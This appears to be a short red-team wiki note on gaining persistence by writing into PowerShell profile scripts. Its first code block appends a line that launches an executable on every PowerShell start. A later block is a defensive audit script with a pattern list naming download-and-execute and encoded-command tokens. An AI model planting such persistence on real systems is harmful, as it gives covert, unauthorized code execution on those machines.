
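Abusing PowerShell Profiles

PowerShell executes the contents of its profile scripts every time it starts, so anything written into a profile runs again with each new session.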

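```powershell
# Show the current user / current host profile path and check whether it exists
echo $profile
Test-Path $profile
# Create the profile file (-Force creates missing parent directories and overwrites an existing file)
New-Item -Path $profile -Type File -Force
# Line appended to the profile; it runs on every PowerShell start
$string = 'Start-Process "C:\Temp\qwqdanchun.exe"'
# cmd-style %HOMEPATH% is not expanded by PowerShell, so use $env:USERPROFILE
$string | Out-File -FilePath "$env:USERPROFILE\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append
```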

PowerShell has several default profile files. They are listed below from top to bottom in order of precedence, highest first.

| Description | Path |
| --- | --- |
| All Users, All Hosts | `$PSHOME\Profile.ps1` |
| All Users, Current Host | `$PSHOME\Microsoft.PowerShell_profile.ps1` |
| Current User, All Hosts | `$Home\[My ]Documents\PowerShell\Profile.ps1` |
| Current User, Current Host | `$Home\[My ]Documents\PowerShell\Microsoft.PowerShell_profile.ps1` |
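
A defender-side audit of the profile locations listed above, as an added example that is not part of the original note: it reports every profile script that exists, with its hash, last write time and Authenticode status, and flags lines that match a pattern list. The pattern list and the extra per-user directories it checks are assumptions chosen for illustration.

```powershell
# Added example: audit the profile scripts PowerShell loads at startup.
# Assumption: this pattern list is illustrative, not a complete detection rule.
$suspicious = 'Start-Process|Invoke-Expression|\bIEX\b|DownloadString|Invoke-WebRequest|EncodedCommand|FromBase64String'

# $PROFILE carries the four profile paths of the running host as note properties.
$scopes = 'AllUsersAllHosts', 'AllUsersCurrentHost', 'CurrentUserAllHosts', 'CurrentUserCurrentHost'
$paths  = @(foreach ($s in $scopes) { $PROFILE.$s })

# Also check the per-user directories of both editions
# (Windows PowerShell 5.1 uses WindowsPowerShell, PowerShell 7 uses PowerShell).
$docs = [Environment]::GetFolderPath('MyDocuments')
foreach ($dir in 'WindowsPowerShell', 'PowerShell') {
    $paths += Join-Path $docs "$dir\Profile.ps1"
    $paths += Join-Path $docs "$dir\Microsoft.PowerShell_profile.ps1"
}

$report = foreach ($p in ($paths | Where-Object { $_ } | Sort-Object -Unique)) {
    # Most systems have no profile at all, so an existing file is already worth a look.
    if (-not (Test-Path -LiteralPath $p -PathType Leaf)) { continue }

    $item = Get-Item -LiteralPath $p -Force
    $hits = Select-String -LiteralPath $p -Pattern $suspicious

    [pscustomobject]@{
        Path       = $p
        LastWrite  = $item.LastWriteTime
        SHA256     = (Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash
        Signature  = (Get-AuthenticodeSignature -LiteralPath $p).Status
        Suspicious = @($hits | ForEach-Object { '{0}: {1}' -f $_.LineNumber, $_.Line.Trim() })
    }
}

$report | Format-List
```

Run it from a session started with `powershell.exe -NoProfile` so the profiles under inspection are not executed before the audit begins.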

References:

{% embed url="https://github.com/enigma0x3/PowershellProfile" caption="" %}

{% embed url="https://enigma0x3.net/2014/06/16/abusing-powershell-profiles/" caption="" %}

{% embed url="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.1&viewFallbackFrom=powershell-6" caption="" %}